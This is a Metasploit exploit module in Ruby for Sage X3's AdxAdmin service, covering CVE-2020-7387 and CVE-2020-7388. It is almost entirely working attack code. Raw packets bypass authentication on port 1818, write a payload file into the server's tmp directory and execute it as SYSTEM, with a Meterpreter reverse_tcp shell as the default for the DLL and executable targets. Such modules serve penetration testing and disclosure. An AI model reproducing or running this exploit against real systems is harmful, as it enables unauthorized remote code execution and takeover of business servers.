Sage X3 Administration Service Authentication Bypass / Command Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Sage X3 Administration Service Authentication Bypass Command Execution',  
'Description' => %q{  
This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration  
protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an  
available AdxAdmin service.  
},  
'Author' => [  
'Jonathan Peterson <deadjakk[at]shell.rip>', # @deadjakk  
'Aaron Herndon' # @ac3lives  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2021-07-07',  
'References' =>  
[  
['CVE', '2020-7387'], # Infoleak  
['CVE', '2020-7388'], # RCE  
['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']  
],  
'Privileged' => true,  
'Platform' => 'win',  
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],  
'Targets' => [  
[  
'Windows Command',  
{  
'Arch' => ARCH_CMD,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/windows/generic',  
'CMD' => 'whoami'  
}  
}  
],  
[  
'Windows DLL',  
{  
'Arch' => [ARCH_X86, ARCH_X64],  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'  
}  
}  
],  
[  
'Windows Executable',  
{  
'Arch' => [ARCH_X86, ARCH_X64],  
'DefaultOptions' => {  
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'  
}  
}  
]  
],  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [FIRST_ATTEMPT_FAIL],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
  
register_options(  
[  
Opt::RPORT(1818)  
]  
)  
end  
  
def vprint(msg = '')  
print(msg) if datastore['VERBOSE']  
end  
  
def check  
s = connect  
print_status('Connected')  
  
# ADXDIR command authentication header  
# allows for unauthenticated retrieval of X3 directory  
auth_packet = "\x09\x00"  
s.write(auth_packet)  
  
# recv response  
res = s.read(1024)  
  
if res.nil? || res.length != 4  
print_bad('ADXDIR authentication failed')  
return CheckCode::Safe  
end  
  
if res.chars == ["\xFF", "\xFF", "\xFF", "\xFF"]  
print_bad('ADXDIR authentication failed')  
return CheckCode::Safe  
end  
  
print_good('ADXDIR authentication successful.')  
  
# ADXDIR command  
adx_dir_msg = "\x07\x41\x44\x58\x44\x49\x52\x00"  
s.write(adx_dir_msg)  
directory = s.read(1024)  
  
return CheckCode::Safe if directory.nil?  
  
sagedir = directory[4..-2]  
print_good(format('Received directory info from host: %s', sagedir))  
disconnect  
  
CheckCode::Vulnerable(details: { sagedir: sagedir })  
rescue Rex::ConnectionError  
CheckCode::Unknown  
end  
  
def build_buffer(head, sage_payload, tail)  
buffer = ''  
  
# do things  
buffer << head if head  
buffer << sage_payload.length  
buffer << sage_payload  
buffer << tail if tail  
  
buffer  
end  
  
def write_file(sock, filenum, sage_payload, target, sagedir)  
s = sock  
  
# building the initial authentication packet  
# [2bytes][userlen 1 byte][username][userlen 1 byte][username][passlen 1 byte][CRYPT:HASH]  
# Note: the first byte of this auth packet is different from the ADXDIR command  
  
revsagedir = sagedir.gsub('\\', '/')  
  
s.write("\x06\x00")  
auth_resp = s.read(1024)  
  
fail_with(Failure::UnexpectedReply, 'Directory message did not provide intended response') if auth_resp.length != 4  
  
print_good('Command authentication successful.')  
  
# May require additional information such as file path  
# this will be used for multiple messages  
  
head = "\x00\x00\x36\x02\x00\x2e\x00" # head  
fmt = '@%s/tmp/cmd%s$cmd'  
fmt = '@%s/tmp/cmd%s.dll' if target == 'Windows DLL'  
fmt = '@%s/tmp/cmd%s.exe' if target == 'Windows Executable'  
pload = format(fmt, revsagedir, filenum)  
tail = "\x00\x03\x00\x01\x77"  
sendbuf = build_buffer(head, pload, tail)  
s.write(sendbuf)  
s.read(1024)  
  
# Packet --- 3  
# Creating the packet that contains the command to run  
head = "\x02\x00\x05\x08\x00\x00\x00"  
  
# this writes the data to the .cmd file to get executed  
# a single write can't be larger than ~250 bytes  
# so writes larger than 250 need to be broken up  
written = 0  
print_status('Writing data')  
  
while written < sage_payload.length  
vprint('.')  
  
towrite = sage_payload[written..written + 250]  
sendbuf = build_buffer(head, towrite, nil)  
s.write(sendbuf)  
s.recv(1024)  
  
written += towrite.length  
end  
  
vprint("\r\n")  
end  
  
def exploit  
sage_payload = payload.encoded if target.name == 'Windows Command'  
sage_payload = generate_payload_dll if target.name == 'Windows DLL'  
sage_payload = generate_payload_exe if target.name == 'Windows Executable'  
  
sagedir = check.details[:sagedir]  
  
if sagedir.nil?  
fail_with(Failure::NotVulnerable,  
'No directory was returned by the remote host, may not be vulnerable')  
end  
  
if sagedir.end_with?('AdxAdmin')  
register_dir_for_cleanup("#{sagedir}\\tmp")  
end  
  
revsagedir = sagedir.gsub('\\', '/')  
  
filenum = rand_text_numeric(8)  
vprint_status(format('Using generated filename: %s', filenum))  
  
s = connect  
  
write_file(s, filenum, sage_payload, target.name, sagedir)  
  
unless target.name == 'Windows Command'  
disconnect  
# re-establish connection after writing file  
s = connect  
end  
  
if target.name == 'Windows DLL'  
sage_payload = "rundll32.exe #{sagedir}\\tmp\\cmd#{filenum}.dll,0"  
vprint_status(sage_payload)  
write_file(s, filenum, sage_payload, nil, sagedir)  
end  
  
if target.name == 'Windows Executable'  
sage_payload = "#{sagedir}\\tmp\\cmd#{filenum}.exe"  
vprint_status(sage_payload)  
write_file(s, filenum, sage_payload, nil, sagedir)  
end  
  
# Some sort of delimiter  
delim0 = "\x02\x00\x01\x01" # bufm  
s.write(delim0)  
s.recv(1024)  
  
# Packet --- 4  
sage_payload = "@#{revsagedir}/tmp/sess#{filenum}$cmd"  
head = "\x00\x00\x37\x02\x00\x2f\x00"  
tail = "\x00\x03\x00\x01\x77"  
sendbuf = build_buffer(head, sage_payload, tail)  
s.write(sendbuf)  
s.recv(1024)  
  
# Packet --- 5  
head = "\x02\x00\x05\x08\x00\x00\x00"  
sage_payload = "@echo off\r\n#{sagedir}\\tmp\\cmd#{filenum}.cmd 1>#{sagedir}\\tmp\\#{filenum}.out 2>#{sagedir}\\tmp\\#{filenum}.err\r\n@echo on"  
sendbuf = build_buffer(head, sage_payload, nil)  
s.write(sendbuf)  
s.recv(1024)  
  
# Packet --- Delim  
s.write(delim0)  
s.recv(1024)  
  
# Packet --- 6  
head = "\x00\x00\x36\x04\x00\x2e\x00"  
sage_payload = "#{revsagedir}\\tmp\\sess#{filenum}.cmd"  
tail = "\x00\x03\x00\x01\x72"  
sendbuf = build_buffer(head, sage_payload, tail)  
s.write(sendbuf)  
s.recv(1024)  
  
# if it's not COMMAND, we can stop here  
# otherwise, we'll send/recv the last bit  
# of info for the output  
unless target.name == 'Windows Command'  
disconnect  
return  
end  
  
# Packet --- Delim  
delim1 = "\x02\x00\x05\x05\x00\x00\x10\x00"  
s.write(delim1)  
s.recv(1024)  
  
# Packet --- Delim  
s.write(delim0)  
s.recv(1024)  
  
# The two below are directing the server to read from the .out file that should have been created  
# Then we get the output back  
# Packet --- 7 - Still works when removed.  
head = "\x00\x00\x2f\x07\x08\x00\x2b\x00"  
sage_payload = "@#{revsagedir}/tmp/#{filenum}$out"  
sendbuf = build_buffer(head, sage_payload, nil)  
s.write(sendbuf)  
s.recv(1024)  
  
# Packet --- 8  
head = "\x00\x00\x33\x02\x00\x2b\x00"  
sage_payload = "@#{revsagedir}/tmp/#{filenum}$out"  
tail = "\x00\x03\x00\x01\x72"  
sendbuf = build_buffer(head, sage_payload, tail)  
s.write(sendbuf)  
s.recv(1024)  
  
s.write(delim1)  
returned_data = s.recv(8096).strip!  
  
if returned_data.nil? || returned_data.empty?  
disconnect  
fail_with(Failure::PayloadFailed, 'No data appeared to be returned, try again')  
end  
  
print_good('------------ Response Received ------------')  
print_status(returned_data)  
disconnect  
end  
  
end  
`